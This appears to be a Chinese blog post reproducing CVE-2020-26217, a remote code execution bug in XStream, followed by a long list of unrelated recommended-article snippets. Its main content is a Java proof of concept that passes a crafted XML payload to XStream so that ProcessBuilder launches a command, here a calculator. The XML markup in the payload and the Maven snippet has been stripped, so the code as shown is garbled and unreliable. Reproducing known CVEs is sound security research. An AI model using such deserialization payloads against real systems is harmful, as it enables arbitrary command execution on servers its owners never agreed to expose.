wh1te8ea
wh1te8ea

[CVE-2020-26217] XStream 远程代码执行漏洞复现

image.png

0x01 环境搭建

通过maven安装XStream:

    
        
        
            com.thoughtworks.xstream
            xstream
            1.4.11.1

0x02 漏洞复现

PoC:

import com.thoughtworks.xstream.XStream;


public class xstreamdemo {
    public static void main (String[] args){
        XStream xstream = new XStream();
        String xml = "\n" +
                "  \n" +
                "    \n" +
                "      0\n" +
                "      \n" +
                "        \n" +
                "          \n" +
                "            text/plain\n" +
                "            \n" +
                "              \n" +
                "                \n" +
                "                  \n" +
                "                    0\n" +
                "                    -1\n" +
                "                    1\n" +
                "                    \n" +
                "                      \n" +
                "                        \n" +
                "                          open\n" +
                "                          -a\n" +
                "                          Calculator\n" +
                "                        \n" +
                "                      \n" +
                "                    \n" +
                "                  \n" +
                "                  \n" +
                "                    \n" +
                "                      java.lang.ProcessBuilder\n" +
                "                      start\n" +
                "                      \n" +
                "                    \n" +
                "                    start\n" +
                "                  \n" +
                "                  \n" +
                "                \n" +
                "                KEYS\n" +
                "              \n" +
                "              \n" +
                "                \n" +
                "                0\n" +
                "                0\n" +
                "                0\n" +
                "              \n" +
                "            \n" +
                "            false\n" +
                "          \n" +
                "          \n" +
                "        \n" +
                "        0\n" +
                "      \n" +
                "    \n" +
                "    test\n" +
                "  \n" +
                "";
        xstream.fromXML(xml);
    }
}
image.png

0x03 参考

https://x-stream.github.io/CVE-2017-7957.html
https://xz.aliyun.com/t/8526

你可能感兴趣的:([CVE-2020-26217] XStream 远程代码执行漏洞复现)

  • 通过Java代码实现图片的放大和缩小
    在多模态模型的架构上,ChatGPT的绘图能力主要依赖以下几个核心组件:跨模态编码器(Cross-ModalEncoder):跨模态编码器的作用是将文本和图像的特征进行对齐。GPT可以将用户输入的文本描述转换为文本特征表示,然后利用跨模态编码器将这些特征映射到图像特征空间。这种方式确保模型能够理解描述性语言中不同细节是如何与图像特征对应的。
  • 机器学习数据预处理preprocessing之KernelCenterer 一叶_障目 机器学习人工智能
    sklearn.preprocessing.KernelCenterer对矩阵XXX执行中心化操作,即使得核矩阵的行和列的均值为零给定二维矩阵XXX,可以下式得到其核变换矩阵KKK:K(X,X)=ϕ(X).ϕ(X)TK(X,X)=\phi(X).\phi(X)^TK(X,X)=ϕ(X).ϕ(X)T式中ϕ(X)\phi(X)ϕ(X)是一种将XXX从原始空间映射到希尔伯特空间的函数希尔伯特空间是一种完
  • 大数据最新医学图像分割 3D nnUNet全流程快速实现_医学图像分割步骤 2401_84182020 程序员大数据
    第一步:选择一个你能找的路径位置(这很重要),在这个位置打开终端,输入gitclonehttps://github.com/MIC-DKFZ/nnUNet.git,将nnUNet的代码下载到这个位置第二步:终端内定位到下载的nnUNet文件夹cdnnUNet,或者直接在对应位置打开终端第三步:开始安装,pipinstall-e.2数据整理2.1数据存放形式首先,nnUNet有自己的一套数据文件夹的
  • C语言魔法秀:代码中的“隐藏技能”大揭秘!从位运算到联合体的奇幻之旅 firdawn c语言算法开发语言
    掌握一些有创意和想法的编程技巧对于提升编程能力和写出高效、优雅的代码至关重要。以下是一些我分享的C语言编程技巧,它们不仅深入而且能够增加编程效率。1.利用位运算优化性能C语言中的位运算是一种非常强大的工具,可以用于高效地处理整数数据。通过位运算,我们可以实现快速的数值计算、状态标记和数据压缩。例如,使用位与(&)和位或(|)运算可以高效地合并和分离标志位,使用位移(>)运算可以快速地进行数值的乘除
  • 用Python做一个网页 我是学习编程的人 多多照顾我吧求你 python
    要用Python做一个网页,你可以使用Flask或Django这样的Web框架。这里以Flask为例,给出一个简单的示例:1.首先,确保你已经安装了Flask。如果没有,可以使用以下命令安装:```bashpipinstallflask```2.创建一个名为`app.py`的文件,并在其中编写以下代码:```pythonfromflaskimportFlask,render_templateapp
  • 3DUnet实现3D医学影像的有效分割 Andrew_Xzw python深度学习githubopencv计算机视觉分割
    最近涉及到了3D医学影像的分割,网络上相关的实现比较少,因此进行实现记录。3DUnet实现3D医学影像的有效分割1.配置代码环境2.配置数据集以及模型文件3.训练4.预测1.配置代码环境这里介绍一个很好的开源项目,git为:https://github.com/ellisdg/3DUnetCNN.git。安装环境为:nibabel>=4.0.1numpy>=1.23.0#torch>=1.12.0
  • OpenCV基础学习 yzx991013 OpenCV基础全集学习
    5.1开运算完整代码:importcv2importnumpyasnpdefcir():try:image=cv2.imread("./image/xingtai/cirrec.jpg")kernel=cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(11,11))src=cv2.morphologyEx(image,cv2.MORPH_OPEN,kerne
  • OpenCV实例应用 yzx991013 OpenCV基础全集opencv人工智能计算机视觉
    5.0图像的腐蚀应用完整代码:importcv2importnumpyasnpdeferode():img=cv2.imread('./image/dige.png')kernel=np.ones((3,3),np.uint8)erosion=cv2.erode(img,kernel,iterations=1)erosion1=cv2.erode(img,kernel,iterations=2)r
  • Android wifi热点开关代码记录 峥嵘life androidandroid
    Androidwifi热点开关代码记录一、前言wifi和热点开关的代码可以用WifiManager也可以调用ConnectivityManager的接口实现。下面记录一下。二、代码实现1、wifi开关//wifi开关publicstaticvoidsetWifiState(Contextcontext,booleanisSetWifiEnable){WifiManagermWifiManager=
  • 调试Hadoop源代码 一张假钞 hadoopeclipse大数据
    个人博客地址:调试Hadoop源代码|一张假钞的真实世界Hadoop版本Hadoop2.7.3调试模式下启动HadoopNameNode在${HADOOP_HOME}/etc/hadoop/hadoop-env.sh中设置NameNode启动的JVM参数,如下:exportHADOOP_NAMENODE_OPTS="-Xdebug-Xrunjdwp:transport=dt_socket,addr
  • 在RuoYi若依中生成代码并自定义功能 阿符阿 前端后端数据库htmlbootstrapajaxjavasql
    目录一、代码生成的三层架构二、页面内容2.1下拉列表2.2自定义表单和表格三、数据传递3.1页面传值给后台3.2后台传值给页面四、业务逻辑4.1减少访问4.2功能:更改序号-逻辑五、数据访问5.1带上@param5.2功能:更改序号-操作六、结语一、代码生成的三层架构使用若依后台系统的代码生成功能,会得到以下结构的项目文件:|--src||--main||--java|||--com|||--or
  • 深度学习模块C2f代码详解 你是狒狒吗 目标检测人工智能计算机视觉pytorchYOLO神经网络
    C2f是一个用于构建卷积神经网络(CNN)的模块,特别是在YOLOv5和YOLOv8等目标检测模型中。这个模块是一个改进的CSP(CrossStagePartial)Bottleneck结构,旨在提高计算效率和特征提取能力。下面是对C2f类的详细解释:类定义和初始化Python复制classC2f(nn.Module):“”“FasterImplementationofCSPBottleneckw
  • day39——多线程实例、多线程锁 weixin_33953384 javapython
    python的锁可以独立提取出来1mutex=threading.Lock()2#锁的使用3#创建锁4mutex=threading.Lock()5#锁定6mutex.acquire([timeout])7#释放8mutex.release()概念资源加锁其实并不是给资源加锁,而是用锁去锁定资源,你可以定义多个锁,像下面的代码,当你需要独占某一资源时,任何一个锁都可以锁这个资源就好比你用不同的锁都
  • python多线程锁实战_Python多线程锁 7Nut7 python多线程锁实战
    在多线程程序执行过程中,为什么需要给一些线程加锁以及如何加锁,下面就来说一说。1.给线程加锁的原因我们知道,不同进程之间的内存空间数据是不能够共享的,试想一下,如果可以随意共享,谈何安全?但是一个进程中的多个线程是可以共享这个进程的内存空间中的数据的,比如多个线程可以同时调用某一内存空间中的某些数据(只是调用,没有做修改)。试想一下,在某一进程中,内存空间中存有一个变量对象的值为num=8,假如某
  • PyInstaller 构建的 Windows EXE 因多处理而失败 潮易 windows
    PyInstaller构建的WindowsEXE因多处理而失败PyInstaller是Python一个用于将Python脚本打包成可执行的exe文件的工具,但是它并不支持所有Python库,尤其是那些依赖于C扩展或使用PythonCAPI的库。如果你的程序在使用某些不支持的库时失败了,那么你可能需要寻找其他的解决方案,如使用其他的打包工具或者修改你的代码以适应这些库。以下是一个详细的步骤,说明如何
  • 给Wordpress添加评分功能到评论表单 鱼仰泳 WordPress开发手记WordPressPHPcss前端网站开发
    今天要给你的Wordpress添加评分功能到评论表单吗?评分功能效果图什么类型的网站需要评分?资源站教程站其他,我也没想到。。。但我这个网站,因为是电影类的网站,好像还是有点需要的,所以,我就给它加上。修改后台代码(functions.php)添加评分代码首先,你需要将下面代码复制到functions.php中://添加打分脚本到评论表单//codebyyangjiyongVX:uu0216fun
  • Node.js --- 模板引擎EJS 蒜蓉大猩猩 Node.jsnode.js后端express中间件
    1.前言模板引擎是一种工具或库,用于在开发中生成动态内容的HTML页面。它通过将预定义的模板与数据结合,生成最终的输出(如HTML页面、字符串等)。模板引擎广泛应用于前端和后端开发,尤其是在构建动态网站时。2.EJS模板引擎EJS(EmbeddedJavaScriptTemplates)是一种模板引擎,可以帮助我们在HTML页面中嵌入JavaScript代码,用于动态渲染内容。EJS语法简洁且与H
  • Python 对海表面温度进行EOF分解与前n模态合成 我有一个梦想——人在家中葛优躺 pythonmatplotlib
    一、EOF分解数据来源:来自NOAA的2017-2021年0.25°×0.25°的日平均OISST数据(海表面温度数据)。关于EOF的理解:利用2017-2020年4年数据进行EOF分解,2021年1月1日的数据来做合成检验。对长度是1461的二维海表面温度数据进行分解,分解得到的时间序列一共1461组长度1461的时间序列,一共1461个二维空间模态。按照方差大小从前到后。代码实现:import
  • git命令手册 哈~~哈~ git
    生成秘钥:ssh-keygen#切换目标分支(以master为目标分支为例)gitcheckoutmaster#拉取仓库master分支的最新版本gitpull#本地备份gitbranchbackup#删除本地分支gitbranch-Dmaster#在master分支下创建分支gitchekcoutmaster#强制推送到远程gitpush-f-uoriginmaster#列出远程分支gitbra
  • 【OpenCV入门学习--python】绘图函数 喜欢星星的田螺姑娘 OpenCVopencvpython学习
    源代码:(查看教材《OpenCV-Python中文教程》段力辉译)importnumpyasnpimportcv2#Createablackimageimg=np.zeros((512,512,3),np.uint8)#将所有像素点的各通道数值赋0#其中“3”是三个通道的意思#np.zeros函数用于创建一个数值全为0的矩阵,np.ones用于创建一个数值全为1的矩阵#Drawadiagonalb
  • jdbc连接出现ServerTimezone问题 一个小坑货 常见错误积累mysqljava
    代码中添加时区需要在jdbc的url连接中添加serverTimezone=Asia/Shanghai。例如:jdbc:mysql://localhost:3306/db1?serverTimezone=Asia/Shanghaijdbc:mysql://localhost:3306/db1?serverTimezone=GMTIdea链接mysql错误Idea链接mysql错误—Goto‘Adv
  • 为什么要使用MQ?思维导图 代码示例(java 架构) 用心去追梦 java架构开发语言
    使用消息队列(MQ)的主要原因在于它能够提供解耦、异步通信、流量削峰等特性,这些特性对于构建稳定、高效、可扩展的分布式系统至关重要。下面是关于为什么使用MQ的详细解释,包括思维导图建议和Java代码示例。为什么要使用MQ思维导图建议解耦应用程序之间减少直接依赖灵活地添加或移除服务数据库与应用逻辑分离防止数据库过载异步处理提升响应速度用户无需等待长时间操作完成改善用户体验页面加载更快流量削峰处理突发
  • 【多线程】Java中的多线程 ainioayi java多线程
    Java中的多线程1.1Java中的多线程Java程序的进程里有几个线程:主线程,垃圾回收线程(后台线程)等在Java中,当我们启动main函数时其实就是启动了一个JVM的进程,而main函数所在的线程就是这个进程中的一个线程,也称主线程。Java支持多线程,当Java程序执行main方法的时候,就是在执行一个名字叫做main的线程,可以在main方法执行时,开启多个线程A,B,C,多个线程mai
  • 代码结构与模块化设计:Python 项目架构与高效开发技巧 全栈探索者chen pythonpython架构开发语言模块化性能优化程序人生案例分析
    代码结构与模块化设计:Python项目架构与高效开发技巧目录为什么模块化设计是高效开发的基础Python项目的理想目录结构模块与包:概念与使用详解模块化设计的核心原则常见设计模式与模块化案例分析:从零搭建模块化Python项目高级技巧:动态模块加载与插件化设计模块化开发中的常见问题与解决方案总结与实践建议1.为什么模块化设计是高效开发的基础模块化设计是一种将复杂的软件系统分解为多个小模块的开发方式
  • java合并word mischen520 word合并java项目实战javaword
    最近在做一个需求,主要是将多个word合并输出为一个word,经过调研,代码如下所示:1.导入pom.xmlorg.apache.poipoi-ooxml4.1.22.测试类:packagecom.common.utils;importorg.apache.poi.openxml4j.opc.OPCPackage;importorg.apache.poi.openxml4j.util.ZipSec
  • Node的基本模块 ma_no_lo node前端javascript大数据htmlnode.js
    一,fs模块1.读fs用于文件,文件夹读写,以下是一些基本的api使用实例constfs=require("fs");首先,我们引入fs模块,这里用的是commonjs,也可以使用import,但是捣鼓费劲。引入模块后,对于读写,fs提供三种方式:第一种,同步,或者叫阻塞。在这种模式下,代码会阻塞在读取文件这一行代码上,直至完成任务后,程序才会继续。constres=fs.readFileSync
  • Eclipse插件开发二:初识hello word的配置信息 歪桃 eclipsejavaide
    在之前的文章中,我们创建了一个例子,现在我们来认识这个例子。Eclipse插件开发一:helloword以下是目录结构,主要有一个java类,一个MANIFEST.MF配置,一个plugin.xml配置1.MANIFEST.MFMANIFEST.MF文件的主要作用是提供插件的元数据,使得Eclipse平台能够正确加载和管理插件。它定义了插件的基本信息、依赖关系和执行环境要求,确保插件在运行时能够找
  • python多线程的锁用法 hellenlee22 python
    锁机制在了解锁机制前,我们先来看一下下面这个例子:##使用多线程进行加法运算importthreading#定义全局变量VALUEVALUE=0#定义加法线程函数defadd_value():globalVALUEforxinrange(1000000):VALUE+=1print('value=',VALUE)#定义两个线程并发执行加法操作defadd_thread_main():forxinr
  • EOF分析在Python中的利器:eofs库使用指南 潘妙霞
    EOF分析在Python中的利器:eofs库使用指南项目地址:https://gitcode.com/gh_mirrors/eo/eofs项目介绍eofs是一个专为Python环境设计的开源包,用于执行经验正交分解(EmpiricalOrthogonalFunction,EOF)分析。该库遵循GNUGPLv3许可协议,旨在简化Python中进行EOF分析的流程。它特别适合处理大型时空数据集,通过高
  • python实现pdf和word互转 cicif2006 pythonpdf开发语言
    首先,安装python-office包python3-mpipinstallpython-office-ihttps://pypi.tuna.tsinghua.edu.cn/simple第二步,撰写代码pdf转wordimportoffice#转单个文件office.pdf.pdf2docx(file_path=r'D:\税务\税务师\法律\【直播预习讲义】6月10日_涉税法律教材研读_第四章_行
  • jquery实现的jsonp掉java后台 知了ing javajsonpjquery
    什么是JSONP? 先说说JSONP是怎么产生的: 其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里,对于很多刚接触的人来讲理解起来有些困难,小可不才,试着用自己的方式来阐释一下这个问题,看看是否有帮助。 1、一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准; 2、
  • Struts2学习笔记 caoyong struts2
    SSH : Spring + Struts2 + Hibernate 三层架构(表示层,业务逻辑层,数据访问层) MVC模式 (Model View Controller) 分层原则:单向依赖,接口耦合 1、Struts2  =  Struts  + Webwork 2、搭建struts2开发环境    a>、到www.apac
  • SpringMVC学习之后台往前台传值方法 满城风雨近重阳 springMVC
    springMVC控制器往前台传值的方法有以下几种: 1.ModelAndView    通过往ModelAndView中存放viewName:目标地址和attribute参数来实现传参:      ModelAndView mv=new ModelAndView();  mv.setViewName="success
  • WebService存在的必要性? 一炮送你回车库 webservice
    做Java的经常在选择Webservice框架上徘徊很久,Axis  Xfire Axis2 CXF ,他们只有一个功能,发布HTTP服务然后用XML做数据传输。 是的,他们就做了两个功能,发布一个http服务让客户端或者浏览器连接,接收xml参数并发送xml结果。 当在不同的平台间传输数据时,就需要一个都能解析的数据格式。 但是为什么要使用xml呢?不能使json或者其他通用数据
  • js年份下拉框 3213213333332132 java web ee
    <div id="divValue">test...</div>测试 //年份 <select id="year"></select> <script type="text/javascript"> window.onload =
  • 简单链式调用的实现技术 归来朝歌 方法调用链式反应编程思想
    在编程中,我们可以经常遇到这样一种场景:一个实例不断调用它自身的方法,像一条链条一样进行调用 这样的调用你可能在Ajax中,在页面中添加标签: $("<p>").append($("<span>").text(list[i].name)).appendTo("#result");   也可能在HQ
  • JAVA调用.net 发布的webservice 接口 darkranger webservice
    /** * @Title: callInvoke * @Description: TODO(调用接口公共方法) * @param @param url 地址 * @param @param method 方法 * @param @param pama 参数 * @param @return * @param @throws BusinessException
  • Javascript模糊查找 | 第一章 循环不能不重视。 aijuans Way
    最近受我的朋友委托用js+HTML做一个像手册一样的程序,里面要有可展开的大纲,模糊查找等功能。我这个人说实在的懒,本来是不愿意的,但想起了父亲以前教我要给朋友搞好关系,再加上这也可以巩固自己的js技术,于是就开始开发这个程序,没想到却出了点小问题,我做的查找只能绝对查找。具体的js代码如下: function search(){ var arr=new Array("my
  • 狼和羊,该怎么抉择 atongyeye 工作
    狼和羊,该怎么抉择 在做一个链家的小项目,只有我和另外一个同事两个人负责,各负责一部分接口,我的接口写完,并全部测联调试通过。所以工作就剩下一下细枝末节的,工作就轻松很多。每天会帮另一个同事测试一些功能点,协助他完成一些业务型不强的工作。 今天早上到公司没多久,领导就在QQ上给我发信息,让我多协助同事测试,让我积极主动些,有点责任心等等,我听了这话,心里面立马凉半截,首先一个领导轻易说
  • 读取android系统的联系人拨号 百合不是茶 androidsqlite数据库内容提供者系统服务的使用
           联系人的姓名和号码是保存在不同的表中,不要一下子把号码查询来,我开始就是把姓名和电话同时查询出来的,导致系统非常的慢   关键代码:     1, 使用javabean操作存储读取到的数据 package com.example.bean; /** * * @author Admini
  • ORACLE自定义异常 bijian1013 数据库自定义异常
    实例: CREATE OR REPLACE PROCEDURE test_Exception ( ParameterA IN varchar2, ParameterB IN varchar2, ErrorCode OUT varchar2 --返回值,错误编码 ) AS /*以下是一些变量的定义*/ V1 NUMBER; V2 nvarc
  • 查看端号使用情况 征客丶 windows
    一、查看端口 在windows命令行窗口下执行: >netstat -aon|findstr "8080" 显示结果: TCP     127.0.0.1:80         0.0.0.0:0    &
  • 【Spark二十】运行Spark Streaming的NetworkWordCount实例 bit1129 wordcount
    Spark Streaming简介   NetworkWordCount代码   /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with
  • Struts2 与 SpringMVC的比较 BlueSkator struts2spring mvc
    1. 机制:spring mvc的入口是servlet,而struts2是filter,这样就导致了二者的机制不同。 2. 性能:spring会稍微比struts快。spring mvc是基于方法的设计,而sturts是基于类,每次发一次请求都会实例一个action,每个action都会被注入属性,而spring基于方法,粒度更细,但要小心把握像在servlet控制数据一样。spring
  • Hibernate在更新时,是可以不用session的update方法的(转帖) BreakingBad Hibernateupdate
    地址:http://blog.csdn.net/plpblue/article/details/9304459 public void synDevNameWithItil() {Session session = null;Transaction tr = null;try{session = HibernateUtil.getSession();tr = session.beginTran
  • 读《研磨设计模式》-代码笔记-观察者模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; import java.util.Observable; import java.util.Observer; /** * “观
  • 重置MySQL密码 chenhbc mysql重置密码忘记密码
    如果你也像我这么健忘,把MySQL的密码搞忘记了,经过下面几个步骤就可以重置了(以Windows为例,Linux/Unix类似): 1、关闭MySQL服务 2、打开CMD,进入MySQL安装目录的bin目录下,以跳过权限检查的方式启动MySQL mysqld --skip-grant-tables  3、新开一个CMD窗口,进入MySQL mysql -uroot  
  • 再谈系统论,控制论和信息论 comsci 设计模式生物能源企业应用领域模型
                               再谈系统论,控制论和信息论     偶然看
  • oracle moving window size与 AWR retention period关系 daizj oracle
    转自: http://tomszrp.itpub.net/post/11835/494147 晚上在做11gR1的一个awrrpt报告时,顺便想调整一下AWR snapshot的保留时间,结果遇到了ORA-13541这样的错误.下面是这个问题的发生和解决过程. SQL> select * from v$version; BANNER -------------------
  • Python版B树 dieslrae python
    话说以前的树都用java写的,最近发现python有点生疏了,于是用python写了个B树实现,B树在索引领域用得还是蛮多了,如果没记错mysql的默认索引好像就是B树... 首先是数据实体对象,很简单,只存放key,value class Entity(object): '''数据实体''' def __init__(self,key,value)
  • C语言冒泡排序 dcj3sjt126com 算法
    代码示例: # include <stdio.h> //冒泡排序 void sort(int * a, int len) { int i, j, t; for (i=0; i<len-1; i++) { for (j=0; j<len-1-i; j++) { if (a[j] > a[j+1]) // >表示升序
  • 自定义导航栏样式 dcj3sjt126com 自定义
    -(void)setupAppAppearance { [[UILabel appearance] setFont:[UIFont fontWithName:@"FZLTHK—GBK1-0" size:20]]; [UIButton appearance].titleLabel.font =[UIFont fontWithName:@"FZLTH
  • 11.性能优化-优化-JVM参数总结 frank1234 jvm参数性能优化
    1.堆 -Xms --初始堆大小 -Xmx --最大堆大小 -Xmn --新生代大小 -Xss --线程栈大小 -XX:PermSize  --永久代初始大小 -XX:MaxPermSize  --永久代最大值 -XX:SurvivorRatio --新生代和suvivor比例,默认为8 -XX:TargetSurvivorRatio --survivor可使用
  • nginx日志分割 for linux HarborChung nginxlinux脚本
    nginx日志分割 for linux 默认情况下,nginx是不分割访问日志的,久而久之,网站的日志文件将会越来越大,占用空间不说,如果有问题要查看网站的日志的话,庞大的文件也将很难打开,于是便有了下面的脚本   使用方法,先将以下脚本保存为 cutlog.sh,放在/root 目录下,然后给予此脚本执行的权限   复制代码代码如下: chmo
  • Spring4新特性——泛型限定式依赖注入 jinnianshilongnian springspring4泛型式依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • centOS安装GCC和G++ liuxihope centosgcc
    Centos支持yum安装,安装软件一般格式为yum install .......,注意安装时要先成为root用户。 按照这个思路,我想安装过程如下: 安装gcc:yum install gcc 安装g++: yum install g++ 实际操作过程发现,只能有gcc安装成功,而g++安装失败,提示g++ command not found。上网查了一下,正确安装应该
  • 第13章 Ajax进阶(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • How to determine BusinessObjects service pack and fix pack blueoxygen BO
    http://bukhantsov.org/2011/08/how-to-determine-businessobjects-service-pack-and-fix-pack/   The table below is helpful. Reference   BOE XI 3.x 12.0.0. y BOE XI 3.0 12.0. x. y BO
  • Oracle里的自增字段设置 tomcat_oracle oracle
     大家都知道吧,这很坑,尤其是用惯了mysql里的自增字段设置,结果oracle里面没有的。oh,no   我用的是12c版本的,它有一个新特性,可以这样设置自增序列,在创建表是,把id设置为自增序列 create table t ( id       number generated by default as identity (start with 1 increment b
  • Spring Security(01)——初体验 yang_winnie springSecurity
    Spring Security(01)——初体验     博客分类: spring Security Spring Security入门安全认证        首先我们为Spring Security专门建立一个Spring的配置文件,该文件就专门用来作为Spring Security的配置
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他